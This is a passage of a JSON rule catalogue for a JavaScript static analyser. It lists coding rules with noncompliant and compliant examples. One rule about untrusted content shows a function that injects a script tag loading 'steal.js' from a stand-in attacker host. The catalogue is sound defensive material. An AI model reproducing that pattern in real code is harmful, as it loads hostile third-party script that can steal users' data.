\/\/...\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2251","repo":"javascript","name":"A \"for\" loop update clause should move the counter in the right direction","htmlDesc":"<p>A <code>for<\/code> loop with a stop condition that can never be reached, such as one with a counter that moves in the wrong direction, will run\ninfinitely. While there are occasions when an infinite loop is intended, the convention is to construct such loops as <code>while<\/code> loops. More\ntypically, an infinite <code>for<\/code> loop is a bug. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfor (var i = 0; i < strings.length; i--) { \/\/ Noncompliant;\n \/\/...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfor (var i = 0; i < strings.length; i++) {\n \/\/...\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/zYEzAg\">CERT, MSC54-J.<\/a> - Avoid inadvertent wrapping of loop counters <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2392","repo":"javascript","name":"Variables should be defined in the blocks where they are used","htmlDesc":"<p>A variable that is declared at function scope, but only used inside a single block should be declared in that block, and variables that are\ndeclared inside a block but used outside of it (which is possible with a <code>var<\/code>-style declaration) should be declared outside the block.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction doSomething(a, b) {\n var i; \/\/ Noncompliant; should be declared in if-block\n if (a > b) {\n i = a;\n console.log(i);\n var x = a - b; \/\/ Noncompliant; should be declared outside if-block\n }\n\n if (a > 4) {\n console.log(x);\n }\n\n return a+b;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction doSomething(a, b) {\n var x = a - b;\n\n if (a > b) {\n var i = a;\n console.log(i);\n }\n\n if (a > 4) {\n console.log(x);\n }\n\n return a+b;\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2424","repo":"javascript","name":"Built-in objects should not be overridden","htmlDesc":"<p>Overriding an object changes its behavior and could potentially impact all code using that object. Overriding standard, built-in objects could\ntherefore have broad, potentially catastrophic effects on previously-working code.<\/p>\n<p>This rule detects overrides of the following native objects:<\/p>\n<ul>\n <li> Fundamental objects - Object, Function, Boolean, Symbol, Error, EvalError, InternalError, RangeError, ReferenceError, SyntaxError, TypeError,\n URIError <\/li>\n <li> Numbers and dates - Number, Math, Date <\/li>\n <li> Text processing - String, RegExp <\/li>\n <li> Indexed collections - Array, Int8Array, Uint8Array, Uint8ClampedArray, Int16Array, Unit16Array, Int32Array, Uint32Array, Float32Array,\n Float64Array <\/li>\n <li> Keyed collections - Map, Set, WeakMap, WeakSet <\/li>\n <li> Structured data - ArrayBuffer, DataView, JSON <\/li>\n <li> Control abstraction objects - Promise <\/li>\n <li> Reflection - Reflect, Proxy <\/li>\n <li> Internationalization - Intl <\/li>\n <li> Non-standard objects - Generator, Iterator, ParallelArray, StopIteration <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2427","repo":"javascript","name":"The base should be provided to \"parseInt\"","htmlDesc":"<p>The <code>parseInt<\/code> function has two versions, one that takes a base value as a second argument, and one that does not. Unfortunately using\nthe single-arg version can result in unexpected results on older browsers. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nparseInt(\"010\"); \/\/ Noncompliant; pre-2013 browsers may return 8\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nparseInt(\"010\", 10);\n<\/pre>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2432","repo":"javascript","name":"Setters should not return values","htmlDesc":"<p>Functions declared with the <code>set<\/code> keyword will automatically return the values they were passed. Thus any value explicitly returned from\na setter will be ignored, and explicitly returning a value is an error.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar person = {\n \/\/ ...\n set name(name) {\n this.name = name;\n return 42; \/\/ Noncompliant\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar person = {\n \/\/ ...\n set name(name) {\n this.name = name;\n }\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2508","repo":"javascript","name":"The names of model properties should not contain spaces","htmlDesc":"<p>When using the Backbone.js framework, the names of model attributes should not contain spaces. This is because the Events object accepts\nspace-delimited lists of events, so an attributes with spaces in the names could be misinterpreted.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nPerson = Backbone.Model.extend({\n defaults: {\n 'first name': 'Bob', \/\/ Noncompliant\n 'birth date': new Date() \/\/ Noncompliant\n },\n });\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nPerson = Backbone.Model.extend({\n defaults: {\n firstName: 'Bob',\n birthDate: new Date()\n },\n });\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2583","repo":"javascript","name":"Conditionally executed blocks should be reachable","htmlDesc":"<p>Conditional expressions which are always <code>true<\/code> or <code>false<\/code> can lead to dead code. Such code is always buggy and should never\nbe used in production.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\na = false;\nif (a) { \/\/ Noncompliant\n doSomething(); \/\/ never executed\n}\n\nif (!a || b) { \/\/ Noncompliant; \"!a\" is always \"true\", \"b\" is never evaluated\n doSomething();\n} else {\n doSomethingElse(); \/\/ never executed\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 13.7 - Boolean operations whose results are invariant shall not be permitted. <\/li>\n <li> MISRA C:2012, 14.3 - Controlling expressions shall not be invariant <\/li>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/570.html\">MITRE, CWE-570<\/a> - Expression is Always False <\/li>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/571\">MITRE, CWE-571<\/a> - Expression is Always True <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n executed <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2589","repo":"javascript","name":"Boolean expressions should not be gratuitous","htmlDesc":"<p>If a boolean expression doesn't change the evaluation of the condition, then it is entirely unnecessary, and can be removed. If it is gratuitous\nbecause it does not match the programmer's intent, then it's a bug and the expression should be fixed.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\na = true;\nif (a) { \/\/ Noncompliant\n doSomething();\n}\n\nif (b && a) { \/\/ Noncompliant; \"a\" is always \"true\"\n doSomething();\n}\n\nif (c || !a) { \/\/ Noncompliant; \"!a\" is always \"false\"\n doSomething();\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\na = true;\nif (foo(a)) {\n doSomething();\n}\n\nif (b) {\n doSomething();\n}\n\nif (c) {\n doSomething();\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 13.7 - Boolean operations whose results are invariant shall not be permitted. <\/li>\n <li> MISRA C:2012, 14.3 - Controlling expressions shall not be invariant <\/li>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/489\">MITRE, CWE-489<\/a> - Leftover Debug Code <\/li>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/571\">MITRE, CWE-571<\/a> - Expression is Always True <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n executed <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2611","repo":"javascript","name":"Untrusted content should not be included","htmlDesc":"<p>Including content in your site from an untrusted source can expose your users to attackers and even compromise your own site. For that reason, this\nrule raises an issue for each non-relative URL.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction include(url) {\n var s = document.createElement(\"script\");\n s.setAttribute(\"type\", \"text\/javascript\");\n s.setAttribute(\"src\", url);\n document.body.appendChild(s);\n}\ninclude(\"http:\/\/hackers.com\/steal.js\") \/\/ Noncompliant\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/829\">MITRE, CWE-829<\/a> - Inclusion of Functionality from Untrusted Control Sphere <\/li>\n <li> <a href=\"http:\/\/www.sans.org\/top25-software-errors\/\">SANS Top 25<\/a> - Risky Resource Management <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[{"key":"domainsToIgnore","htmlDesc":"Comma-delimited list of domains to ignore. Regexes may be used, e.g. (.*\\.)?example.com,foo.org","type":"STRING"}],"type":"VULNERABILITY"},{"key":"javascript:S2688","repo":"javascript","name":"\"NaN\" should not be used in comparisons","htmlDesc":"<p><code>NaN<\/code> is not equal to anything, even itself. Testing for equality or inequality against <code>NaN<\/code> will yield predictable results,\nbut probably not the ones you want. <\/p>\n<p>Instead, the best way to see whether a variable is equal to <code>NaN<\/code> is to use <code>Number.isNaN()<\/code>, since ES2015, or (perhaps\ncounter-intuitively) to compare it to itself. Since <code>NaN !== NaN<\/code>, when <code>a !== a<\/code>, you know it must equal <code>NaN<\/code>.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar a = NaN;\n\nif (a === NaN) { \/\/ Noncompliant; always false\n console.log(\"a is not a number\"); \/\/ this is dead code\n}\nif (a !== NaN) { \/\/ Noncompliant; always true\n console.log(\"a is not NaN\"); \/\/ this statement is not necessarily true\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (Number.isNaN(a)) {\n console.log(\"a is not a number\");\n}\nif (!Number.isNaN(a)) {\n console.log(\"a is not NaN\");\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/7AEqAQ\">CERT, NUM07-J.<\/a> - Do not attempt comparisons with NaN <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2692","repo":"javascript","name":"\"indexOf\" checks should not be for positive numbers","htmlDesc":"<p>Most checks against an <code>indexOf<\/code> call against a string or array compare it with -1 because 0 is a valid index. Any checks which look for\nvalues >0 ignore the first element, which is likely a bug.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar color = \"blue\";\nvar name = \"ishmael\";\nvar number = 123;\n\nvar arr = [color, name];\n\nif (arr.indexOf(\"blue\") > 0) { \/\/ Noncompliant\n \/\/ ...\n}\nif (arr[0].indexOf(\"ish\") > 0 { \/\/ Noncompliant\n \/\/ ...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar color = \"blue\";\nvar name = \"ishmael\";\nvar number = 123;\n\nvar arr = [color, name];\n\nif (arr.indexOf(\"blue\") >= 0) {\n \/\/ ...\n}\nif (arr[0].indexOf(\"ish\") > -1) {\n \/\/ ...\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2714","repo":"javascript","name":"Element type selectors should not be used with class selectors","htmlDesc":"<p>Using element type in class selectors is slower than using only the class selector.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar $products = $(\"div.products\"); \/\/ Noncompliant - slow\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar $products = $(\".products\"); \/\/ Compliant - fast\n<\/pre>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2715","repo":"javascript","name":"\"find\" should be used to select the children of an element known by id","htmlDesc":"<p>The use of <code>find<\/code> allows <code>document.getElementById()<\/code> to be used for the top-level selection, and saves the jQuery Sizzle\nengine for where it's really needed. That makes the query faster, and your application more responsive.<\/p>\n<p>From the jQuery documentation:<\/p>\n<blockquote>\n <p>Beginning your selector with an ID is always best.<\/p>\n <p>The <code>.find()<\/code> approach is faster because the first selection is handled without going through the Sizzle selector engine \u2013 ID-only\n selections are handled using <code>document.getElementById()<\/code>, which is extremely fast because it is native to the browser.<\/p>\n<\/blockquote>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar $productIds = $(\"#products div.id\"); \/\/ Noncompliant - a nested query for Sizzle selector engine\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar $productIds = $(\"#products\").find(\"div.id\"); \/\/ Compliant - #products is already selected by document.getElementById() so only div.id needs to go through Sizzle selector engine\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2757","repo":"javascript","name":"\"=+\" should not be used instead of \"+=\"","htmlDesc":"<p>The use of operators pairs (<code>=+<\/code> or <code>=-<\/code>) where the reversed, single operator was meant (<code>+=<\/code> or <code>-=<\/code>)\nwill compile and run, but not produce the expected results.<\/p>\n<p>This rule raises an issue when <code>=+<\/code> and <code>=-<\/code> are used without any space between the two operators and when there is at least\none whitespace after.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar target =-5;\nvar num = 3;\n\ntarget =- num; \/\/ Noncompliant; target = -3. Is that really what's meant?\ntarget =+ num; \/\/ Noncompliant; target = 3\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar target = -5;\nvar num = 3;\n\ntarget = -num; \/\/ Compliant; intent to assign inverse value of num is clear\ntarget += num;\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2770","repo":"javascript","name":"Deprecated jQuery methods should not be used","htmlDesc":"<p>Deprecation is a warning that a method has been superseded, and will eventually be removed. The deprecation period allows you to make a smooth\ntransition away from the aging, soon-to-be-retired technology.<\/p>\n<p>This rule raises an issue when any of the following methods is used:<\/p>\n<ul>\n <li> <code>.andSelf()<\/code> <\/li>\n <li> <code>.context<\/code> <\/li>\n <li> <code>.die()<\/code> <\/li>\n <li> <code>.error()<\/code> <\/li>\n <li> <code>jQuery.boxModel<\/code> <\/li>\n <li> <code>jQuery.browser<\/code> <\/li>\n <li> <code>jQuery.sub()<\/code> <\/li>\n <li> <code>jQuery.support<\/code> <\/li>\n <li> <code>.live()<\/code> <\/li>\n <li> <code>.load()<\/code> <\/li>\n <li> <code>.selector<\/code> <\/li>\n <li> <code>.size()<\/code> <\/li>\n <li> <code>.toggle()<\/code> <\/li>\n <li> <code>.unload()<\/code> <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2817","repo":"javascript","name":"Web SQL databases should not be used","htmlDesc":"<p>The Web SQL Database standard never saw the light of day. It was first formulated, then deprecated by the W3C and was only implemented in some\nbrowsers. (It is not supported in Firefox or IE.)<\/p>\n<p>Further, the use of a Web SQL Database poses security concerns, since you only need its name to access such a database.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar db = window.openDatabase(\"myDb\", \"1.0\", \"Personal secrets stored here\", 2*1024*1024); \/\/ Noncompliant\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A6-Sensitive_Data_Exposure\">OWASP Top Ten 2013 Category A6<\/a> - Sensitive Data Exposure\n <\/li>\n <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A9-Using_Components_with_Known_Vulnerabilities\">OWASP Top Ten 2013 Category A9<\/a> - Using\n Components with Known Vulnerabilities <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"VULNERABILITY"},{"key":"javascript:S2819","repo":"javascript","name":"Cross-document messaging domains should be carefully restricted","htmlDesc":"<p>HTML5 adds the ability to send messages to documents served from other domains. According to the specification:<\/p>\n<blockquote>\n Authors should not use the wildcard keyword (\n <code>*<\/code>) in the\n <code>targetOrigin<\/code> argument in messages that contain any confidential information, as otherwise there is no way to guarantee that the message\n is only delivered to the recipient to which it was intended.\n<\/blockquote>\n<p>To mitigate the risk of sending sensitive information to a document served from a hostile or unknown domain, this rule raises an issue each time\n<code>Window.postMessage<\/code> is used.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar myWindow = document.getElementById('myIFrame').contentWindow;\nmyWindow.postMessage(message, \"*\"); \/\/ Noncompliant; how do you know what you loaded in 'myIFrame' is still there?\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A3-Cross-Site_Scripting_(XSS)\">OWASP Top Ten 2013 Category A3<\/a> - Cross-Site Scripting\n (XSS) <\/li>\n<\/ul>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"VULNERABILITY"},{"key":"javascript:S2870","repo":"javascript","name":"\"delete\" should not be used on arrays","htmlDesc":"<p>The <code>delete<\/code> operator can be used to remove a property from any object. Arrays are objects, so the <code>delete<\/code> operator can be\nused here too, but if it is, a hole will be left in the array because the indexes\/keys won't be shifted to reflect the deletion. <\/p>\n<p>The proper method for removing an element at a certain index would be:<\/p>\n<ul>\n <li> <code>Array.prototype.splice<\/code> - add\/remove elements from the the array <\/li>\n <li> <code>Array.prototype.pop<\/code> - add\/remove elements from the end of the array <\/li>\n <li> <code>Array.prototype.shift<\/code> - add\/remove elements from the beginning of the array <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar myArray = ['a', 'b', 'c', 'd'];\n\ndelete myArray[2]; \/\/ Noncompliant. myArray => ['a', 'b', undefined, 'd']\nconsole.log(myArray[2]); \/\/ expected value was 'd' but output is undefined\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar myArray = ['a', 'b', 'c', 'd'];\n\n\/\/ removes 1 element from index 2\nremoved = myArray.splice(2, 1); \/\/ myArray => ['a', 'b', 'd']\nconsole.log(myArray[2]); \/\/ outputs 'd'\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2873","repo":"javascript","name":"Calls should not be made to non-callable values","htmlDesc":"<p>The fact that JavaScript is not a strongly typed language allows developers a lot of freedom, but that freedom can be dangerous if you go too far\nwith it. <\/p>\n<p>Specifically, it is syntactically acceptable to invoke any expression as though its value were a function. But a <code>TypeError<\/code> may be\nraised if you do.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfoo = 1;\nfoo(); \/\/ Noncompliant; TypeError\n\nfoo = undefined;\nfoo(); \/\/ Noncompliant; TypeError\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2898","repo":"javascript","name":"\"[type=...]\" should be used to select elements by type","htmlDesc":"<p>While <code>:<element_type><\/code> and <code>[type=\"<element_type>\"]<\/code> can both be used in jQuery to select elements by their\ntype, <code>[type=\"<element_type>\"]<\/code> is far faster because it can take advantage of the native DOM <code>querySelectorAll()<\/code> method\nin modern browsers. <\/p>\n<p>This rule raises an issue when following selectors are used:<\/p>\n<ul>\n <li> <code>:checkbox<\/code> <\/li>\n <li> <code>:file<\/code> <\/li>\n <li> <code>:image<\/code> <\/li>\n <li> <code>:password<\/code> <\/li>\n <li> <code>:radio<\/code> <\/li>\n <li> <code>:reset<\/code> <\/li>\n <li> <code>:text<\/code> <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar input = $( \"form input:radio\" ); \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar input = $( \"form input[type=radio]\" ); \/\/ Compliant\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2990","repo":"javascript","name":"The global \"this\" object should not be used","htmlDesc":"<p>When the keyword <code>this<\/code> is used outside of an object, it refers to the global <code>this<\/code> object, which is the same thing as the\n<code>window<\/code> object in a standard web page. This could be confusing to maintainers. Instead, simply drop the <code>this<\/code>, or replace it\nwith <code>window<\/code>; it will have the same effect and be more readable.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nthis.foo = 1; \/\/ Noncompliant\nconsole.log(this.foo); \/\/ Noncompliant\n\nfunction MyObj() {\n this.foo = 1; \/\/ Compliant\n}\n\nMyObj.func1 = function() {\n if (this.foo == 1) { \/\/ Compliant\n \/\/ ...\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfoo = 1;\nconsole.log(foo);\n\nfunction MyObj() {\n this.foo = 1;\n}\n\nMyObj.func1 = function() {\n if (this.foo == 1) {\n \/\/ ...\n }\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2999","repo":"javascript","name":"\"new\" operators should be used with functions","htmlDesc":"<p>The <code>new<\/code> keyword should only be used with objects that define a constructor function. Use it with anything else, and you'll get a\n<code>TypeError<\/code> because there won't be a constructor function for the <code>new<\/code> keyword to invoke.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction MyClass() {\n this.foo = 'bar';\n}\n\nvar someClass = 1;\n\nvar obj1 = new someClass; \/\/ Noncompliant;\nvar obj2 = new MyClass(); \/\/ Noncompliant if considerJSDoc parameter set to true. Compliant when considerJSDoc=false\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n\/**\n * @constructor\n *\/\nfunction MyClass() {\n this.foo = 'bar';\n}\n\nvar someClass = function(){\n this.prop = 1;\n}\n\nvar obj1 = new someClass; \/\/ Compliant\nvar obj2 = new MyClass(); \/\/ Compliant regardless of considerJSDoc value\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[{"key":"considerJSDoc","htmlDesc":"Consider only functions with @constructor tag as constructor functions","defaultValue":"false","type":"BOOLEAN"}],"type":"BUG"},{"key":"javascript:S3001","repo":"javascript","name":"\"delete\" should be used only with object properties","htmlDesc":"<p>The semantics of the <code>delete<\/code> operator are a bit tricky, and it can only be reliably used to remove properties from objects. Pass\nanything else to it, and you may or may not get the desired result.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar x = 1;\ndelete x; \/\/ Noncompliant\n\nfunction foo(){\n..\n}\n\ndelete foo; \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar obj = {\n x:1,\n foo: function(){\n ...\n }\n};\ndelete obj.x;\ndelete obj.foo;\n\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3358","repo":"javascript","name":"Ternary operators should not be nested","htmlDesc":"<p>Just because you <em>can<\/em> do something, doesn't mean you should, and that's the case with nested ternary operations. Nesting ternary operators\nresults in the kind of code that may seem clear as day when you write it, but six months later will leave maintainers (or worse - future you)\nscratching their heads and cursing.<\/p>\n<p>Instead, err on the side of clarity, and use another line to express the nested operation as a separate statement.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\npublic String getTitle(Person p) {\n\n return p.gender==Person.MALE?\"Mr. \":p.isMarried()?\"Mrs. \":\"Miss \" + p.getLastName(); \/\/ Noncompliant\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n\n String honorific = p.isMarried()?\"Mrs. \":\"Miss \";\n return p.gender==Person.MALE?\"Mr. \": honorific + p.getLastName();\n<\/pre>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3500","repo":"javascript","name":"Attempts should not be made to update \"const\" variables","htmlDesc":"<p>Variables declared with <code>const<\/code> cannot be modified. Unfortunately, attempts to do so don't always raise an error; in a non-ES2015\nenvironment, such an attempt might simply be ignored.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nconst pi = \"yes, please\";\npi = 3.14; \/\/ Noncompliant\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3509","repo":"javascript","name":"Default parameters should not cause side effects","htmlDesc":"<p>The assignment of default parameter values is generally intended to help the caller. But when a default assignment causes side effects, the caller\nmay not be aware of the extra changes or may not fully understand their implications. I.e. default assignments with side effects may end up hurting\nthe caller, and for that reason, they should be avoided.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar count = 0;\n\nfunction go(i = count++) { \/\/ Noncompliant\n console.log(i);\n}\n\ngo(); \/\/ outputs 0\ngo(7); \/\/ outputs 7\ngo(); \/\/ outputs 1\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3513","repo":"javascript","name":"\"arguments\" should not be accessed directly","htmlDesc":"<p>The magic of JavaScript is that you can pass arguments to functions that don't declare parameters, and on the other side, you can use those\npassed-in arguments inside the no-args <code>function<\/code>. <\/p>\n<p>But just because you can, that does't mean you should. The expectation and use of arguments inside functions that don't explicitly declare them is\nconfusing to callers. No one should ever have to read and fully understand a function to be able to use it competently. <\/p>\n<p>If you don't want to name arguments explicitly, use the <code>...<\/code> syntax to specify that an a variable number of arguments is expected. Then\ninside the function, you'll be dealing with a first-class array, rather than an array-like structure.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction concatenate() {\n let args = Array.prototype.slice.call(arguments); \/\/ Noncompliant\n return args.join(', ');\n}\n\nfunction doSomething(isTrue) {\n var args = Array.prototype.slice.call(arguments, 1); \/\/ Noncompliant\n if (!isTrue) {\n for (var arg of args) {\n ...\n }\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction concatenate(...args) {\n return args.join(', ');\n}\n\nfunction doSomething(isTrue, ...values) {\n if (!isTrue) {\n for (var value of values) {\n ...\n }\n }\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3514","repo":"javascript","name":"Destructuring syntax should be used for assignments","htmlDesc":"<p>ECMAScript 2015 introduced the ability to extract and assign multiple data points from an object or array simultaneously. This is called\n\"destructuring\", and it allows you to condense boilerplate code so you can concentrate on logic. <\/p>\n<p>This rule raises an issue when multiple pieces of data are extracted out of the same object or array and assigned to variables.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction foo (obj1, obj2, array) {\n var a = obj1.a; \/\/ Noncompliant\n var b = obj1.b;\n\n var name = obj2.name; \/\/ ignored; there's only one extraction-and-assignment\n\n var zero = array[0]; \/\/ Noncompliant\n var one = array[1];\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction foo (obj1, obj2, array) {\n var {a, b} = obj1;\n\n var {name} = obj2; \/\/ this syntax works because var name and property name are the same\n\n var [zero, one] = array;\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3516","repo":"javascript","name":"Function returns should not be invariant","htmlDesc":"<p>When a function is designed to return an invariant value, it may be poor design, but it shouldn't adversely affect the outcome of your program.\nHowever, when it happens on all paths through the logic, it is likely a mistake.<\/p>\n<p>This rule raises an issue when a function contains several <code>return<\/code> statements that all return the same value.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction foo(a) { \/\/ Noncompliant\n let b = 12;\n if (a) {\n return b;\n }\n return b;\n}\n<\/pre>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3523","repo":"javascript","name":"Function constructors should not be used","htmlDesc":"<p>In addition to being obtuse from a syntax perspective, function constructors are also dangerous: their execution evaluates the constructor's string\narguments similar to the way <code>eval<\/code> works, which could expose your program to random, unintended code which can be both slow and a security\nrisk.<\/p>\n<p>In general it is better to avoid it altogether, particularly when used to parse JSON data. You should use ECMAScript 5's built-in JSON functions or\na dedicated library.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar obj = new Function(\"return \" + data)(); \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar obj = JSON.parse(data);\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Function calls where the argument is a string literal (e.g. <code>(Function('return this'))()<\/code>) are ignored. <\/p>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"VULNERABILITY"},{"key":"javascript:S3524","repo":"javascript","name":"Braces and parentheses should be used consistently with arrow functions","htmlDesc":"<p>Shared coding conventions allow teams to collaborate effectively. This rule raises an issue when the use of parentheses with an arrow function does\nnot conform to the configured requirements.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the configured defaults forbidding parentheses<\/p>\n<pre>\nvar foo = (a) => { \/* ... *\/ }; \/\/ Noncompliant; remove parens from arg\nvar bar = (a, b) => { return 0; }; \/\/ Noncompliant; remove curly braces from body\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar foo = a => { \/* ... *\/ };\nvar bar = (a, b) => 0;\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[{"key":"body_braces","htmlDesc":"True to require curly braces around function body. False to forbid them for single-return 